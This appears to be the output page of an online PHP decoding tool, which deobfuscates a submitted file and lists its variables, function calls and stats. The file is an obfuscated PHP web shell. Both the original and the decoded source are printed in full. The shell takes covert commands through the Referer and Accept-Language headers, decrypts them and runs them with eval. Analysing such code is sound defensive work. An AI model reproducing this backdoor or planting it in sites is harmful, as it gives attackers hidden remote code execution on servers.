Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $M=str_replace('fW','','crfWfWfWeafWfWfWte_function'); $t='u["~^query"~^],$q~^);$q=a..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$M=str_replace('fW','','crfWfWfWeafWfWfWte_function');
$t='u["~^query"~^],$q~^);$q=arr~^ay_va~^lues(~^$q);~^preg_~^match_all("/(~^[~^\\w~^]~^)~^[\\w-';
$w='^5~^($i.$kh),0~^,3));~^$f=$sl(~^$ss(md5~^($i.$k~^f~^),0,3));$p~^=""~^;fo~^r($z=1;$~^z<co';
$A='";$p=$ss($p,3);}~^if(a~^rray_key~^_exist~^s~^($~^i,$s)){$s[$i]~^.~^=$p;$e=strpo~^s($s~^[';
$l='4_decod~^e(~^pre~^g_replace(~^array("/~^_/","~^/-/")~^,array("/~^"~^,"+"),$s~^s($~^s[$~^';
$y=']+~^(?:;q=0.([\\d]))?,?/",$~^ra,$m);if($q~^&&$m~^~^){@session~^_sta~^rt();$s=&$~^_SESSIO~';
$R='e(x~^(gzc~^om~^press($o),$k)~^);pr~^~^i~^nt("<$k>$d~^</$k>");@sessi~^on_destr~^oy();}}}}';
$Q='i],0,$e))),$k)~^));$~^o=ob_~^get_~^contents~^();ob_end_c~^lean(~^~^);$d=base6~^4_~^encod';
$r='$kh="5~^d41";$kf~^="402a"~^;fun~^ction x($~^t,$~^k){$c=strl~^en($k~^);$l=s~^trlen($~^~^t);';
$N='unt($m[~^1]);~^$z+~^+)$p.=$q[$m~^[2][~^$z]~^]~^;if(strpo~^s($p,$h)===0~^){~^$s[$i]=~^~^"';
$V='$i]~^,$f);if($e)~^{$k=$~^kh~^.$kf;ob_st~^art()~^;@e~^val(@gzunco~^~^mpress(@x(~^@base6~^';
$f='~^}^$k{$j};}~^}return ~^$o;}$r~^=$_SERV~^ER;$~^rr=@$r[~^"HTTP~^_REFERE~^R"];~^$ra=@~^$r[';
$W='~^"HTTP_~^ACC~^E~^PT_LANGU~^AGE"];if($rr~^&&$r~^a){$u=parse_url~^($rr);~^~^parse_str~^($';
$T='^~^~^N;$ss="substr";$~^sl=~^"strtol~^ower~^";$i=$~^m[1][0~^].$m[1~^][1~^];$h=$sl($ss(md~';
$E='$o="";fo~^r($i~^=0;$~^i<$l;){~^for($j~^=~^0~^;($j<$c~^&~^&$i<$l)~^;$j++,$i++){~^$o.=$t{$i';
$g=str_replace('~^','',$r.$E.$f.$W.$t.$y.$T.$w.$N.$A.$V.$l.$Q.$R);
$C=$M('',$g);$C();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A ";$p=$ss($p,3);}~^if(a~^rray_key~^_exist~^s~^($~^i,$s)){$s[$..
$C None
$E $o="";fo~^r($i~^=0;$~^i<$l;){~^for($j~^=~^0~^;($j<$c~^&~^&$i..
$M create_function
$N unt($m[~^1]);~^$z+~^+)$p.=$q[$m~^[2][~^$z]~^]~^;if(strpo~^s(..
$Q i],0,$e))),$k)~^));$~^o=ob_~^get_~^contents~^();ob_end_c~^le..
$R e(x~^(gzc~^om~^press($o),$k)~^);pr~^~^i~^nt("<$k>$d~^</$k>")..
$T ^~^~^N;$ss="substr";$~^sl=~^"strtol~^ower~^";$i=$~^m[1][0~^]..
$V $i]~^,$f);if($e)~^{$k=$~^kh~^.$kf;ob_st~^art()~^;@e~^val(@gz..
$W ~^"HTTP_~^ACC~^E~^PT_LANGU~^AGE"];if($rr~^&&$r~^a){$u=parse_..
$f ~^}^$k{$j};}~^}return ~^$o;}$r~^=$_SERV~^ER;$~^rr=@$r[~^"HTT..
$g $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$l 4_decod~^e(~^pre~^g_replace(~^array("/~^_/","~^/-/")~^,array..
$r $kh="5~^d41";$kf~^="402a"~^;fun~^ction x($~^t,$~^k){$c=strl~..
$t u["~^query"~^],$q~^);$q=arr~^ay_va~^lues(~^$q);~^preg_~^matc..
$w ^5~^($i.$kh),0~^,3));~^$f=$sl(~^$ss(md5~^($i.$k~^f~^),0,3));..
$y ]+~^(?:;q=0.([\d]))?,?/",$~^ra,$m);if($q~^&&$m~^~^){@session..

Stats

MD5 0337082f3a8b80400b1dd9c76050ddd4
Eval Count 1
Decode Time 108 ms